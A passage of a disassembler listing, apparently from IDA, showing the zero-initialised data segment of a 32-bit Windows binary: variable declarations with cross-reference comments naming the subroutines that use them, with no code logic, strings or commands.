dup(0) dword_42C7BC dd 4 dup(0) dword_42C7CC dd 2 dup(0) dword_42C7D4 dd 3 dup(0) dword_42C7E0 dd 4 dup(0) dword_42C7F0 dd 2 dup(0) dword_42C7F8 dd 4 dup(0) dword_42C808 dd 4 dup(0) dword_42C818 dd 2 dup(0) dword_42C820 dd 3 dup(0) dword_42C82C dd 3 dup(0) dword_42C838 dd 4 dup(0) dword_42C848 dd 3 dup(0) dword_42C854 dd 4 dup(0) dword_42C864 dd 3 dup(0) dword_42C870 dd 3 dup(0) dword_42C87C dd 4 dup(0) dword_42C88C dd 3 dup(0) dword_42C898 dd 3 dup(0) dword_42C8A4 dd 4 dup(0) dword_42C8B4 dd 3 dup(0) dword_42C8C0 dd 3 dup(0) dword_42C8CC dd 4 dup(0) dword_42C8DC dd 3 dup(0) dword_42C8E8 dd 3 dup(0) dword_42C8F4 dd 3 dup(0) dword_42C900 dd 4 dup(0) dword_42C910 dd 4 dup(0) dword_42C920 dd 5 dup(0) dword_42C934 dd 3 dup(0) dword_42C940 dd 3 dup(0) dword_42C94C dd 2 dup(0) dword_42C954 dd 3 dup(0) dword_42C960 dd 4 dup(0) dword_42C970 dd 4 dup(0) dword_42C980 dd 2 dup(0) ; seg000:0040A055�o ...
dword_42C988 dd 5 dup(0) dword_42C99C dd 2 dup(0) dword_42C9A4 dd 3 dup(0) dword_42C9B0 dd 2 dup(0) dword_42C9B8 dd 3 dup(0) dword_42C9C4 dd 2 dup(0) dword_42C9CC dd 3 dup(0) dword_42C9D8 dd 0 dword_42C9DC dd 0 dword_42C9E0 dd 2 dup(0) dword_42C9E8 dd 2 dup(0) dword_42C9F0 dd 3 dup(0) dword_42C9FC dd 2 dup(0) dword_42CA04 dd 2 dup(0) dword_42CA0C dd 0 dword_42CA10 dd 0 dword_42CA14 dd 2 dup(0) dword_42CA1C dd 6 dup(0) dword_42CA34 dd 2 dup(0) dword_42CA3C dd 7 dup(0) dword_42CA58 dd 7 dup(0) dword_42CA74 dd 3 dup(0) dword_42CA80 dd 0 dword_42CA84 dd 3 dup(0) dword_42CA90 dd 0 ; seg000:00409A8B�o ...
dword_42CA94 dd 2 dup(0) ; sub_40E367+F�o
dword_42CA9C dd 2 dup(0) ; sub_40E367+16�o
dword_42CAA4 dd 0Dh dup(0) dword_42CAD8 dd 0Dh dup(0) dword_42CB0C dd 0 dword_42CB10 dd 2 dup(0) ; seg000:00409963�o
dword_42CB18 dd 2 dup(0) dword_42CB20 dd 2 dup(0) dword_42CB28 dd 4 dup(0) ; seg000:00409987�o
dword_42CB38 dd 0Dh dup(0) ; seg000:0040E063�o ...
dword_42CB6C dd 2 dup(0) dword_42CB74 dd 3 dup(0) ; seg000:0040D364�o ...
dword_42CB80 dd 0 dword_42CB84 dd 0 dword_42CB88 dd 4 dup(0) ; seg000:00409748�o ...
dword_42CB98 dd 3 dup(0) dword_42CBA4 dd 2 dup(0) dword_42CBAC dd 25h dup(0) ; seg000:loc_409C5D�o
dword_42CC40 dd 4 dup(0) dword_42CC50 dd 0 ; sub_40E7E6+50�r ...
dword_42CC54 dd 0 ; sub_40E7E6+82�r ...
dword_42CC58 dd 0 dd 2Fh dup(0)
dword_42CD18 dd 0Eh dup(0) dword_42CD50 dd 0Fh dup(0) dword_42CD8C dd 0Ch dup(0) dword_42CDBC dd 9 dup(0) dword_42CDE0 dd 8 dup(0) dword_42CE00 dd 9 dup(0) dword_42CE24 dd 17h dup(0) dword_42CE80 dd 0Bh dup(0) dword_42CEAC dd 17h dup(0) dword_42CF08 dd 0Ah dup(0) dword_42CF30 dd 8 dup(0) dword_42CF50 dd 11h dup(0) dword_42CF94 dd 16h dup(0) dword_42CFEC dd 0Ah dup(0) dword_42D014 dd 0Ch dup(0) dword_42D044 dd 14h dup(0) dword_42D094 dd 17h dup(0) dword_42D0F0 dd 0Ch dup(0) dword_42D120 dd 6 dup(0) dword_42D138 dd 15h dup(0) dword_42D18C dd 0Bh dup(0) dword_42D1B8 dd 0Dh dup(0) dword_42D1EC dd 6 dup(0) dword_42D204 dd 0Bh dup(0) dword_42D230 dd 0Ah dup(0) dword_42D258 dd 3 dup(0) dword_42D264 dd 3 dup(0) dword_42D270 dd 3 dup(0) dword_42D27C dd 3 dup(0) dword_42D288 dd 3 dup(0) dword_42D294 dd 3 dup(0) dword_42D2A0 dd 3 dup(0) dword_42D2AC dd 3 dup(0) dword_42D2B8 dd 3 dup(0) dword_42D2C4 dd 0Ch dup(0) dword_42D2F4 dd 0Eh dup(0) dword_42D32C dd 0Ch dup(0) dword_42D35C dd 10h dup(0) dword_42D39C dd 6 dup(0) dword_42D3B4 dd 0 dword_42D3B8 dd 0 dword_42D3BC dd 0Fh dup(0) dword_42D3F8 dd 0Eh dup(0) dword_42D430 dd 0Fh dup(0) dword_42D46C dd 10h dup(0) dword_42D4AC dd 0Dh dup(0) dword_42D4E0 dd 0Eh dup(0) dword_42D518 dd 5 dup(0) dword_42D52C dd 5 dup(0) dword_42D540 dd 5 dup(0) dword_42D554 dd 5 dup(0) dword_42D568 dd 5 dup(0) dword_42D57C dd 5 dup(0) dword_42D590 dd 4 dup(0) dword_42D5A0 dd 4 dup(0) dword_42D5B0 dd 6 dup(0) dword_42D5C8 dd 6 dup(0) dword_42D5E0 dd 5 dup(0) dword_42D5F4 dd 4 dup(0) dword_42D604 dd 5 dup(0) dword_42D618 dd 4 dup(0) dword_42D628 dd 5 dup(0) dword_42D63C dd 2 dup(0) dword_42D644 dd 2 dup(0) dword_42D64C dd 3 dup(0) dword_42D658 dd 5 dup(0) dword_42D66C dd 4 dup(0) dword_42D67C dd 3 dup(0) dword_42D688 dd 6 dup(0) dword_42D6A0 dd 10h dup(0) dword_42D6E0 dd 2 dup(0) dword_42D6E8 dd 0Eh dup(0) dword_42D720 dd 9 dup(0) dword_42D744 dd 8 dup(0) dword_42D764 dd 9 dup(0) dword_42D788 dd 5 dup(0) dword_42D79C dd 8 dup(0) dword_42D7BC dd 7 dup(0) dword_42D7D8 dd 17h dup(0) dword_42D834 dd 7 dup(0) dword_42D850 dd 9 dup(0) dword_42D874 dd 14h dup(0) dword_42D8C4 dd 0Dh dup(0) dword_42D8F8 dd 7 dup(0) dword_42D914 dd 9 dup(0) dword_42D938 dd 9 dup(0) dword_42D95C dd 6 dup(0) dword_42D974 dd 6 dup(0) dword_42D98C dd 4 dup(0) dword_42D99C dd 5 dup(0) dword_42D9B0 dd 0Ah dup(0) dword_42D9D8 dd 6 dup(0) dword_42D9F0 dd 5 dup(0) dword_42DA04 dd 0Fh dup(0) dword_42DA40 dd 0Fh dup(0) dword_42DA7C dd 3 dup(0) dword_42DA88 dd 5 dup(0) ; seg000:0040F58B�o
dword_42DA9C dd 0Eh dup(0) dword_42DAD4 dd 0Fh dup(0) dword_42DB10 dd 11h dup(0) dword_42DB54 dd 0 dword_42DB58 dd 0 dd 14h dup(0)
dword_42DBAC dd 2 dup(0) ; seg000:0040F80D�o ...
dword_42DBB4 dd 0 dword_42DBB8 dd 0 ; sub_40FA4E+39�o
dword_42DBBC dd 2 dup(0) dword_42DBC4 dd 0 dword_42DBC8 dd 2 dup(0) dword_42DBD0 dd 0 ; sub_40F9AB+57�o
dword_42DBD4 dd 0Fh dup(0) dword_42DC10 dd 10h dup(0) dword_42DC50 dd 0 align 8
dword_42DC58 dd 8 dup(0) dword_42DC78 dd 8 dup(0) dword_42DC98 dd 11h dup(0) dword_42DCDC dd 0Fh dup(0) dword_42DD18 dd 10h dup(0) dword_42DD58 dd 0Eh dup(0) dword_42DD90 dd 10h dup(0) dword_42DDD0 dd 0Eh dup(0) dword_42DE08 dd 11h dup(0) dword_42DE4C dd 14h dup(0) dword_42DE9C dd 12h dup(0) dword_42DEE4 dd 14h dup(0) dword_42DF34 dd 5 dup(0) dword_42DF48 dd 11h dup(0) dword_42DF8C dd 0Ch dup(0) dword_42DFBC dd 0Eh dup(0) dword_42DFF4 dd 3 dup(0) word_42E000 dw 0 ; DATA XREF: sub_40FC75+38�r
align 4
dd 41h dup(0)
dword_42E108 dd 6 dup(0) dword_42E120 dd 0Ah dup(0) dword_42E148 dd 0 align 10h
dword_42E150 dd 0 dd 2 dup(0)
dd 0
dd 2 dup(0)
dword_42E168 dd 0 dword_42E16C dd 5 dup(0) ; sub_411286+2�o
dword_42E180 dd 0 dword_42E184 dd 0 ; sub_417C59+46�r ...
dword_42E188 dd 0 ; sub_412C3C+457�r
dword_42E18C dd 0 dword_42E190 dd 0 ; sub_4109F4:loc_410A55�r ...
dd 0
db 2 dup(0)
word_42E19A dw 0 ; DATA XREF: sub_4195B0+18�r
dd 80h dup(0)
dword_42E39C dd 0 ; sub_4109F4:loc_410A40�r ...
byte_42E3A0 db 0 ; DATA XREF: sub_41496B:loc_4149AB�r
; seg000:004149C9�r ...
align 4
dd 2 dup(0)
dword_42E3AC dd 0 ; sub_41237F+4D�r ...
dword_42E3B0 dd 0 dword_42E3B4 dd 0 dd 34h dup(0)
dbl_42E488 dq 0.0 ; DATA XREF: sub_4143EF+B7�r
; sub_4143EF:loc_4144D6�r ...
dd 2 dup(0)
dbl_42E498 dq 0.0 ; DATA XREF: sub_4143EF+92�r
; sub_4143EF:loc_4144AE�r ...
dd 4 dup(0)
tbyte_42E4B0 dt 0.0 ; DATA XREF: sub_41489C+D�r
; sub_41489C+1F�r
align 4
tbyte_42E4BC dt 0.0 ; DATA XREF: sub_41489C+31�r
align 4
dword_42E4C8 dd 0 ; sub_412C3C+3AA�r
dword_42E4CC dd 0 ; sub_412C3C+3E2�r
dword_42E4D0 dd 0 ; sub_41578D+430�r
dword_42E4D4 dd 0 ; sub_412C3C+3CB�r
dword_42E4D8 dd 0 dword_42E4DC dd 0 dd 5 dup(0)
dword_42E4F4 dd 0 dword_42E4F8 dd 2 dup(0) dword_42E500 dd 2 dup(0) byte_42E508 db 0 ; DATA XREF: sub_416DE3+E1�r
align 10h
dword_42E510 dd 0 dword_42E514 dd 0 align 10h
dword_42E520 dd 0 dd 37h dup(0)
dword_42E600 dd 0 ; sub_41724D+C�o
dword_42E604 dd 0 dd 58h dup(0)
dword_42E768 dd 0 ; sub_4174BF+A�r ...
dword_42E76C dd 0 dd 1Ch dup(0)
dword_42E7E0 dd 0 ; sub_41A044+C8�r
dword_42E7E4 dd 0 ; sub_41A044+CD�r
dword_42E7E8 dd 0 ; sub_41A171+4�r
dword_42E7EC dd 0 ; seg000:0041740D�w ...
dword_42E7F0 dd 2 dup(0) ; sub_4164EB:loc_41656C�o
dword_42E7F8 dd 0 ; sub_417C59+28�r
dword_42E7FC dd 0 ; sub_417C59+12D�r
dd 22h dup(0)
dword_42E888 dd 4 dup(0) ; seg000:00418018�o
dword_42E898 dd 4 dup(0) dword_42E8A8 dd 8 dup(0) ; sub_4172B4+12�o
dword_42E8C8 dd 0Ch dup(0) ; sub_4172B4:loc_4172D2�o
dword_42E8F8 dd 84h dup(0) dword_42EB08 dd 0 ; sub_4140A4+46�r ...
align 10h
dword_42EB10 dd 6 dup(0) dword_42EB28 dd 6 dup(0) dword_42EB40 dd 0 ; seg000:00418BE0�w ...
dword_42EB44 dd 0 ; seg000:00418C0D�w ...
dword_42EB48 dd 0 ; seg000:00418C16�w ...
dd 20h dup(0)
dword_42EBCC dd 0 ; seg000:00418C5B�r ...
dword_42EBD0 dd 0 ; seg000:00418C9D�r ...
align 8
dword_42EBD8 dd 0 ; sub_418DE0+1E�r ...
dword_42EBDC dd 0 ; sub_418F8C+BF�w
dword_42EBE0 dd 0 ; sub_418F8C+E0�w
align 8
dword_42EBE8 dd 0 ; sub_418DE0+26�r ...
dword_42EBEC dd 0 ; sub_418F8C+EA�w ...
dword_42EBF0 dd 0 ; sub_418F8C+23�r ...
dword_42EBF4 dd 0 dd 0Bh dup(0)
dword_42EC24 dd 0 ; sub_418F8C+2E�r ...
dword_42EC28 dd 0 dd 0Dh dup(0)
dword_42EC60 dd 58h dup(0) dword_42EDC0 dd 58h dup(0) dword_42EF20 dd 6 dup(0) ; seg001:0041CDE4�o ...
dword_42EF38 dd 8 dup(0) ; seg001:0041CD64�o ...
dword_42EF58 dd 8 dup(0) ; seg001:0041CD2C�o ...
dword_42EF78 dd 8 dup(0) ; seg001:0041CDB4�o ...
dword_42EF98 dd 111h dup(0) ; seg001:0041CE2C�o
dword_42F3DC dd 2 dup(0) dword_42F3E4 dd 0 ; seg000:0040E180�o ...
dword_42F3E8 dd 0 ; sub_4048A1+74�o ...
dword_42F3EC dd 0 ; sub_403790+51�r ...
dword_42F3F0 dd 0 ; sub_40318D+6B�w ...
align 8
dword_42F3F8 dd 0 ; sub_4053D6+92�w ...
dword_42F3FC dd 0 ; sub_40550F+2ED�w ...
dd 256h dup(0)
dword_42FD58 dd 6 dup(0) ; sub_40550F+138�o ...
dword_42FD70 dd 0 ; seg000:004050FC�o
dword_42FD74 dd 41h dup(0) dword_42FE78 dd 41h dup(0) dword_42FF7C dd 0 ; seg000:0040510E�r
dword_42FF80 dd 0 dword_42FF84 dd 0 ; seg000:004050C9�r
dword_42FF88 dd 20h dup(0) ; seg000:004050B4�o
dword_430008 dd 0 dword_43000C dd 0 ; seg000:004050C1�w
dword_430010 dd 0 align 8
dword_430018 dd 0 ; seg000:00405328�o
dword_43001C dd 0A2h dup(0) dword_4302A4 dd 41h dup(0) dword_4303A8 dd 0 ; seg000:004052DB�r
align 10h
dword_4303B0 dd 0 ; seg000:0040533A�r
dword_4303B4 dd 0 dword_4303B8 dd 0 dword_4303BC dd 0 dd 0
dword_4303C4 dd 0 dword_4303C8 dd 0 ; seg000:0040521B�o
dword_4303CC dd 41h dup(0) dword_4304D0 dd 41h dup(0) dword_4305D4 dd 0 ; seg000:0040522D�r
dword_4305D8 dd 0 dword_4305DC dd 0 dword_4305E0 dd 20h dup(0) ; seg000:004051D3�o
dword_430660 dd 0 dword_430664 dd 0 ; seg000:004051E0�w
dword_430668 dd 0 align 10h
dword_430670 dd 0 ; sub_405D8E+473�r
dword_430674 dd 0 ; seg000:0040F4E2�r
dword_430678 dd 0 ; sub_405D8E+808�r ...
dword_43067C dd 0 ; sub_405D8E+9BE�r ...
dword_430680 dd 0 ; sub_405D8E+98E�r ...
dword_430684 dd 0 ; sub_405D8E+463�r
dword_430688 dd 0 ; sub_405D8E+9B6�r ...
dword_43068C dd 0 ; sub_405D8E+34F�r ...
dword_430690 dd 0 ; sub_40799C+11E�r
dword_430694 dd 0 ; sub_405D8E+357�r ...
dword_430698 dd 0 ; sub_40E9DB+AD�r
dword_43069C dd 0 ; sub_405D8E+4E2�w
dword_4306A0 dd 0 ; sub_405D8E+D2�r ...
dword_4306A4 dd 0 ; sub_405D8E+981�r ...
dword_4306A8 dd 0 ; sub_405D8E+36F�r ...
dword_4306AC dd 0 ; sub_405D8E+834�r
dword_4306B0 dd 0 ; sub_405D8E+27C�r
dword_4306B4 dd 0 ; sub_405D8E+82C�r ...
dword_4306B8 dd 0 dword_4306BC dd 0 ; sub_405D8E+83C�r
dword_4306C0 dd 0 ; sub_405D8E+4D5�w ...
dword_4306C4 dd 0 ; sub_405D8E+CA�r ...
dword_4306C8 dd 0 ; seg000:004075F5�r
dword_4306CC dd 0 ; sub_405D8E+A13�r ...
dword_4306D0 dd 0 ; sub_405D8E+F2�r
dword_4306D4 dd 0 ; sub_405D8E+45B�r
dword_4306D8 dd 0 ; sub_405D8E+57E�w ...
dword_4306DC dd 0 ; sub_405D8E+9AE�r
dword_4306E0 dd 0 ; sub_405D8E+6DC�r
dword_4306E4 dd 0 dword_4306E8 dd 0 ; sub_405D8E+7F5�r
dword_4306EC dd 0 ; sub_4070B7+15�r
dword_4306F0 dd 0 ; sub_405D8E+996�r ...
dword_4306F4 dd 0 ; sub_405D8E+35F�r ...
dword_4306F8 dd 0 ; sub_405D8E+367�r ...
dword_4306FC dd 0 dword_430700 dd 0 ; seg000:loc_401B70�r ...
dword_430704 dd 0 dword_430708 dd 0 ; sub_405D8E+9C6�r ...
dword_43070C dd 0 ; sub_405D8E+284�r ...
dword_430710 dd 0 ; sub_405D8E+DA�r ...
dword_430714 dd 0 ; sub_405D8E+B1B�r ...
dword_430718 dd 0 ; seg000:004018F9�r ...
dword_43071C dd 0 ; sub_405D8E+818�r
dword_430720 dd 0 ; sub_405D8E+99E�r
dword_430724 dd 0 ; sub_405D8E+BB6�r
dword_430728 dd 0 ; sub_405D8E+8B6�r ...
dword_43072C dd 0 dword_430730 dd 0 ; seg000:004014FC�r ...
dword_430734 dd 0 ; sub_405D8E+7FB�r
dword_430738 dd 0 ; sub_405D8E+1C2�r
dword_43073C dd 0 ; sub_405D8E+72C�r ...
dword_430740 dd 0 ; sub_4048A1+62�r ...
dword_430744 dd 0 ; sub_405D8E+664�r
dword_430748 dd 0 ; sub_405D8E:loc_40660F�w ...
dword_43074C dd 0 ; sub_405D8E+26C�r ...
dword_430750 dd 0 ; sub_405D8E+627�w ...
dword_430754 dd 0 ; sub_405D8E+2C9�r ...
dword_430758 dd 0 ; sub_405D8E+377�r ...
dword_43075C dd 0 ; sub_405D8E+BAE�r
dword_430760 dd 0 ; sub_405D8E+810�r
dword_430764 dd 0 ; sub_405D8E+1D2�r ...
dword_430768 dd 0 ; sub_405D8E+820�r
dword_43076C dd 0 ; sub_405D8E+6FC�r
dword_430770 dd 0 ; sub_40801D+5A�r ...
dword_430774 dd 0 ; seg000:004014F1�r ...
dword_430778 dd 0 ; sub_405D8E+2BC�r ...
dword_43077C dd 0 ; sub_405472+82�r ...
dword_430780 dd 0 ; sub_405D8E+436�r
dword_430784 dd 0 ; sub_405D8E+1DA�r ...
dword_430788 dd 0 ; sub_405D8E+342�r ...
dword_43078C dd 0 dword_430790 dd 0 ; seg000:00401A3C�r ...
dword_430794 dd 0 ; seg000:0040114F�r ...
dword_430798 dd 0 ; sub_405D8E+C2�r ...
dword_43079C dd 0 ; sub_405D8E+453�r
dword_4307A0 dd 0 ; sub_405D8E+1BA�r ...
dword_4307A4 dd 0 ; sub_40F2C4+72�r
dword_4307A8 dd 0 ; sub_405D8E+734�r
dword_4307AC dd 0 ; sub_4038A7+1C0�r ...
dword_4307B0 dd 0 ; sub_405D8E+BBE�r
dword_4307B4 dd 0 ; sub_405D8E+BA�r ...
dword_4307B8 dd 0 ; sub_405D8E+274�r ...
dword_4307BC dd 0 ; sub_405982+9C�r ...
dword_4307C0 dd 0 ; seg000:00404AC6�r ...
dword_4307C4 dd 0 ; seg000:0040862E�r
dword_4307C8 dd 0 dword_4307CC dd 0 ; sub_405D8E+B99�r
dword_4307D0 dd 0 ; seg000:00401DB4�r ...
dword_4307D4 dd 0 ; sub_405D8E+443�r
dword_4307D8 dd 0 ; sub_405D8E+46B�r
dword_4307DC dd 0 ; sub_405D8E+44B�r
dword_4307E0 dd 0 ; sub_402773+35�r ...
dword_4307E4 dd 0 ; sub_405D8E+1E2�r ...
dword_4307E8 dd 0 ; sub_405D8E+9CE�r ...
dword_4307EC dd 0 ; sub_405D8E+1AD�r ...
dword_4307F0 dd 0 ; sub_405D8E+E2�r ...
dword_4307F4 dd 0 ; seg000:00401FF8�r ...
dword_4307F8 dd 0 ; sub_405D8E+AD6�r
dword_4307FC dd 0 ; sub_40F382+55�r
dword_430800 dd 0 ; sub_405D8E+25F�r ...
dword_430804 dd 0 dword_430808 dd 0 ; sub_407357+CE�r
dword_43080C dd 0 ; sub_405D8E+A5D�r ...
dword_430810 dd 0 ; seg000:00401C2B�r ...
dword_430814 dd 0 ; sub_405D8E+61A�w ...
dword_430818 dd 0 ; sub_405D8E+BA6�r
dword_43081C dd 0 ; sub_40550F+86�r ...
dword_430820 dd 0 ; sub_405D8E+9A6�r ...
dword_430824 dd 0 ; sub_405982+B3�r ...
dword_430828 dd 0 ; seg000:00401B69�r ...
dword_43082C dd 0 ; sub_4038A7+39F�r ...
dword_430830 dd 0 ; sub_405D8E+ACE�r
dword_430834 dd 0 ; seg000:00401919�r ...
dword_430838 dd 0 ; sub_405D8E+AC1�r
dword_43083C dd 0 ; sub_405D8E+AD�r ...
dword_430840 dd 0 ; sub_405D8E+1CA�r
align 8
dword_430848 dd 0 ; sub_405D8E+8C3�r ...
dword_43084C dd 0 ; sub_405D8E+EA�r ...
dword_430850 dd 0 ; sub_405D8E+12B�w ...
dword_430854 dd 0 ; sub_406977+1C�r
dword_430858 dd 0 ; sub_406977:loc_4069BF�r
dword_43085C dd 0 ; sub_406977+50�r
dword_430860 dd 0 ; sub_405D8E:loc_406063�w ...
dword_430864 dd 0 ; sub_406977+84�r
dword_430868 dd 0 ; sub_406977:loc_406A27�r
dword_43086C dd 0 ; sub_406977+B8�r
dword_430870 dd 0 ; sub_406977:loc_406A5B�r
dword_430874 dd 0 ; sub_406977+EC�r
dword_430878 dd 0 ; sub_405D8E+877�w ...
dword_43087C dd 0 ; sub_406977+120�r
dword_430880 dd 0 ; sub_406977:loc_406AC3�r ...
dword_430884 dd 0 ; sub_406977+154�r
dword_430888 dd 0 ; sub_406977:loc_406AF7�r ...
dword_43088C dd 0 ; sub_406977+188�r
dword_430890 dd 0 ; sub_406977:loc_406B2B�r
dword_430894 dd 0 ; sub_406977+1BC�r
dword_430898 dd 0 ; sub_406977:loc_406B5F�r
dword_43089C dd 0 ; sub_406977+1F0�r
dword_4308A0 dd 0 ; sub_406977:loc_406B93�r
dword_4308A4 dd 0 ; sub_406977+224�r
dword_4308A8 dd 0 ; sub_406977:loc_406BC7�r
dword_4308AC dd 0 ; sub_406977+258�r
dword_4308B0 dd 0 ; sub_406977:loc_406BFB�r
dword_4308B4 dd 0 ; sub_406977+28C�r
dd 83h dup(0)
dword_430AC4 dd 5 dup(0) dword_430AD8 dd 0Eh dup(0) dword_430B10 dd 1000h dup(0) ; sub_407EAE�o ...
dword_434B10 dd 0 ; sub_407EAE+E�o ...
dword_434B14 dd 0Eh dup(0) dword_434B4C dd 3 dup(0) dword_434B58 dd 0 ; sub_407D16+44�r ...
dd 5 dup(0)
dword_434B70 dd 0 ; seg000:00409C8F�r
dd 2D9h dup(0)
dword_4356D8 dd 0 ; sub_407D16+2D�o ...
dd 7Fh dup(0)
dword_4358D8 dd 0 ; sub_4100F2+40�w ...
dword_4358DC dd 0 ; sub_40550F:loc_405556�r ...
dword_4358E0 dd 0 ; sub_4100F2+3A�r ...
dword_4358E4 dd 0 ; seg000:00404A94�w ...
dword_4358E8 dd 0 ; seg000:00405D44�r ...
dword_4358EC dd 0 ; seg000:0040511C�w ...
byte_4358F0 db 0 ; DATA XREF: sub_4090B0+91�o
; seg000:0040BD1F�r ...
align 4
dd 0A4B5h dup(0)
dword_45EBC8 dd 0 ; sub_4089FD+132�w ...
align 10h
dword_45EBD0 dd 0 dword_45EBD4 dd 20h dup(0) ; sub_4089FD+616�o ...
dword_45EC54 dd 10h dup(0) ; seg000:00409C14�o
dword_45EC94 dd 24h dup(0) dword_45ED24 dd 0 ; sub_4089FD+62D�w ...
dword_45ED28 dd 0 dd 3 dup(0)
dd 0
dword_45ED3C dd 0 ; seg000:00409606�r
byte_45ED40 db 0 ; DATA XREF: sub_409218+28�r
; sub_409218+30�o
align 8
dword_45ED48 dd 0 ; sub_4089FD+5E1�r ...
dword_45ED4C dd 0 ; seg000:00409BB8�r
dword_45ED50 dd 17h dup(0) ; sub_40E52B+131�o ...
dword_45EDAC dd 7 dup(0) ; sub_40F2C4+A5�o
dword_45EDC8 dd 0 ; sub_41021E+19�o
dword_45EDCC dd 78h dup(0) dword_45EFAC dd 0 ; sub_40E8A5+4D�r ...
dword_45EFB0 dd 17h dup(0) ; sub_40F190+12D�o
dword_45F00C dd 80h dup(0) ; sub_40E7E6+7D�o ...
byte_45F20C db 0 ; DATA XREF: sub_40E8A5+29�r
; sub_40E8A5+34�w
align 10h
dword_45F210 dd 80h dup(0) ; sub_40EAFC+88�o ...
dword_45F410 dd 81h dup(0) ; sub_40E402+50�o ...
dword_45F614 dd 84h dup(0) dword_45F824 dd 0 dword_45F828 dd 0 ; sub_411914+A4�w
align 10h
word_45F830 dw 0 ; DATA XREF: sub_411914+55�r
; sub_411914+9A�o
word_45F832 dw 0 ; DATA XREF: sub_411914+48�r
db 2 dup(0)
word_45F836 dw 0 ; DATA XREF: sub_411914+3B�r
word_45F838 dw 0 ; DATA XREF: sub_411914+2E�r
word_45F83A dw 0 ; DATA XREF: sub_411914+21�r
align 10h
dword_45F840 dd 0 ; sub_411C60+91�w
dword_45F844 dd 0 ; seg000:loc_411E7A�w ...
dword_45F848 dd 0 ; sub_416300:loc_41639A�w ...
dword_45F84C dd 0 dword_45F850 dd 0 dword_45F854 dd 0 dword_45F858 dd 0 dword_45F85C dd 0 dword_45F860 dd 0 dword_45F864 dd 0 ; sub_4089FD+410�r ...
dd 0
dword_45F86C dd 0 ; sub_41A1B6+9�r ...
dword_45F870 dd 0 dword_45F874 dd 0 ; sub_41A654+4�r ...
dd 0
dd 0
dd 0
byte_45F884 db 0 ; DATA XREF: sub_4125E9+2D�w
; seg000:0041806D�r
align 4
dword_45F888 dd 0 dword_45F88C dd 0 ; sub_4125E9+8B�w
dword_45F890 dd 0 ; seg000:loc_4175AE�r ...
align 8
dword_45F898 dd 0 dword_45F89C dd 0 ; sub_41237F:loc_41247B�r ...
dword_45F8A0 dd 0 dword_45F8A4 dd 0 ; sub_414B6D+1A�r ...
byte_45F8A8 db 0 ; DATA XREF: sub_414A69+3�r
; sub_414A69+98�r ...
align 4
dword_45F8AC dd 0 ; sub_414C4B+21�w ...
byte_45F8B0 db 0 ; DATA XREF: sub_414C4B+51�w
align 4
dword_45F8B4 dd 0 ; sub_41521C+3A�r ...
dword_45F8B8 dd 0 ; sub_41521C+43�r ...
dword_45F8BC dd 0 ; sub_414FE8+5�r
dword_45F8C0 dd 0 dword_45F8C4 dd 0 ; seg000:00416BE0�w ...
align 10h
dword_45F8D0 dd 0 ; sub_412027+9D�r ...
align 10h
dword_45F8E0 dd 0 ; sub_4128E9+BF�r ...
align 8
dword_45F8E8 dd 0 ; seg000:00416F80�w ...
dword_45F8EC dd 0 dd 0
dword_45F8F4 dd 0 ; seg000:004173C4�w ...
dd 41h dup(0)
dword_45F9FC dd 0 ; seg000:00417883�w ...
dword_45FA00 dd 0 dword_45FA04 dd 0 ; sub_4172B4:loc_4172DD�w ...
dword_45FA08 dd 0 ; seg000:loc_41814E�w
align 10h
word_45FA10 dw 0 ; DATA XREF: sub_4187F9+1A�o
; sub_4187F9+46�r
byte_45FA12 db 0 ; DATA XREF: sub_4187F9+39�r
align 4
dword_45FA14 dd 7 dup(0) dword_45FA30 dd 0 ; sub_4187F9+5C�o
dword_45FA34 dd 0 dword_45FA38 dd 0 dword_45FA3C dd 0 dword_45FA40 dd 0 ; seg000:00418954�r ...
align 8
dword_45FA48 dd 0 ; seg000:00418BE5�w ...
align 10h
dword_45FA50 dd 0 ; seg000:00418BC8�r
dword_45FA54 dd 10h dup(0) word_45FA94 dw 0 ; DATA XREF: sub_418DE0+A8�r
word_45FA96 dw 0 ; DATA XREF: seg000:00418BD6�r
; sub_418DE0+DB�r ...
word_45FA98 dw 0 ; DATA XREF: sub_418DE0+CA�r
word_45FA9A dw 0 ; DATA XREF: sub_418DE0+D3�r
; sub_418DE0:loc_418ED2�r
word_45FA9C dw 0 ; DATA XREF: sub_418DE0+C0�r
word_45FA9E dw 0 ; DATA XREF: sub_418DE0+B8�r
word_45FAA0 dw 0 ; DATA XREF: sub_418DE0+B0�r
word_45FAA2 dw 0 ; DATA XREF: sub_418DE0+9E�r
dword_45FAA4 dd 0 dword_45FAA8 dd 10h dup(0) word_45FAE8 dw 0 ; DATA XREF: sub_418DE0+46�r
word_45FAEA dw 0 ; DATA XREF: seg000:loc_418BF9�r
; sub_418DE0+78�r ...
word_45FAEC dw 0 ; DATA XREF: sub_418DE0+67�r
word_45FAEE dw 0 ; DATA XREF: sub_418DE0+70�r
; sub_418DE0:loc_418E64�r
word_45FAF0 dw 0 ; DATA XREF: sub_418DE0+5D�r
word_45FAF2 dw 0 ; DATA XREF: sub_418DE0+55�r
word_45FAF4 dw 0 ; DATA XREF: sub_418DE0+4D�r
word_45FAF6 dw 0 ; DATA XREF: sub_418DE0+3E�r
dword_45FAF8 dd 0 dword_45FAFC dd 0 ; seg000:loc_418CCE�r ...
dword_45FB00 dd 0 dword_45FB04 dd 0 dword_45FB08 dd 0 ; sub_4195E1+2E�w ...
dword_45FB0C dd 0 ; sub_4195E1:loc_419630�r
dword_45FB10 dd 0 ; sub_4195E1+60�r
dword_45FB14 dd 0 ; sub_41A044+6D�o
dword_45FB18 dd 0 ; sub_41A044+44�o
dword_45FB1C dd 0 ; sub_41A044+37�o
dword_45FB20 dd 0 ; sub_41A044+51�o
align 8
dword_45FB28 dd 0 dword_45FB2C dd 0 ; seg000:0041A780�w ...
byte_45FB30 db 0 ; DATA XREF: seg000:0040316C�r
; seg000:00403175�w ...
align 4
dword_45FB34 dd 0 ; sub_41692A+14�r ...
dd 402h dup(0)
dword_460B40 dd 0 ; sub_41647E+56�r ...
dd 7 dup(0)
dword_460B60 dd 0 ; sub_4164EB+75�r ...
dd 3Fh dup(0)
dword_460C60 dd 0 ; sub_4165C4+C�r ...
dword_460C64 dd 0 ; sub_416DE3+65�w ...
align 10h
dword_460C70 dd 3 dup(0) ; sub_416DE3+171�o ...
dword_460C7C dd 0 ; sub_416DE3+15D�w ...
byte_460C80 db 0 ; DATA XREF: sub_417022:loc_41712E�w
; sub_417022:loc_41714B�w ...
align 4
dd 3Fh dup(0)
byte_460D80 db 0 ; DATA XREF: sub_416DE3+5C�o
; sub_416DE3+AF�o ...
byte_460D81 db 0 ; DATA XREF: sub_4121E8+5D�r
; sub_416DE3+A0�w ...
align 4
